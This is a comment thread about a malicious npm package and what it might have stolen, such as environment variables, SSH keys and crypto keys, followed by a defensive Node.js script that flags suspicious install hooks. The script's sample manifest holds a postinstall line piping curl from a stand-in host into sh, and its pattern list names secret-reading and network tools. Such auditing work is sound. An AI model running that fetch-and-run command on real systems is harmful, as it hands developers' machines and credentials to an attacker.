I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
You can actually test it yourself. The actual URL is in the post and the website is still up.
Compromise of developer's access, API keys, etc. in order to create a supply chain attack.
Arbitrary remote code execution, maybe sold to the highest bidder like some shady cloud provider?
This has happened to me. It was an attack that was trying to get crypto private keys (Ethereum).
AFAIK most malware like this first sends the contents of your environment variables, SSH keys, passwords, etc. to the server, and then sets up a persistent process that executes arbitrary commands received from the attacker's server at any time, allowing them to run whatever else they want.
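
What `npm install` runs on its own is determined by a package's lifecycle scripts (`preinstall`, `install`, `postinstall`). As an added example, not part of any comment above: a small Node.js check that lists those hooks and tags the ones whose command line touches environment variables, SSH keys, or the network. The pattern list, function names and sample manifests are assumptions constructed for illustration.

```javascript
// Lifecycle hooks that npm runs automatically during `npm install`.
const AUTO_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic patterns (assumptions for this example, not a complete rule set),
// matching the behaviours described above: reading secrets, fetching remote code.
const SUSPICIOUS = [
  { tag: 'env-access',  re: /process\.env|\bprintenv\b|\benv\b/ },
  { tag: 'ssh-keys',    re: /\.ssh\b|id_rsa|id_ed25519/ },
  { tag: 'network',     re: /\bcurl\b|\bwget\b|https?:\/\// },
  { tag: 'inline-eval', re: /node\s+-e\b|\beval\b|base64/ },
];

// Returns one finding per auto-run hook, with the tags of every pattern it matched.
// Only the hook's command line is inspected; a script file it launches needs its own review.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  return AUTO_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({
      package: manifest.name,
      hook,
      command: scripts[hook],
      tags: SUSPICIOUS.filter((p) => p.re.test(scripts[hook])).map((p) => p.tag),
    }));
}

// Constructed sample manifests (not real packages, hypothetical host name).
const SAMPLES = [
  { name: 'example-clean', scripts: { test: 'node test.js' } },
  { name: 'example-native', scripts: { install: 'node-gyp rebuild' } },
  { name: 'example-suspicious',
    scripts: { postinstall: 'node -e "require(\'./setup\')" && curl -s https://collector.example/setup.sh | sh' } },
];

function auditAll(manifests) {
  return manifests.flatMap(auditManifest);
}

for (const f of auditAll(SAMPLES)) {
  const level = f.tags.length ? 'REVIEW' : 'info';
  console.log(`[${level}] ${f.package} ${f.hook}: ${f.command} (${f.tags.join(', ') || 'no pattern hit'})`);
}
```

Installing with `npm install --ignore-scripts` keeps these hooks from running while they are reviewed.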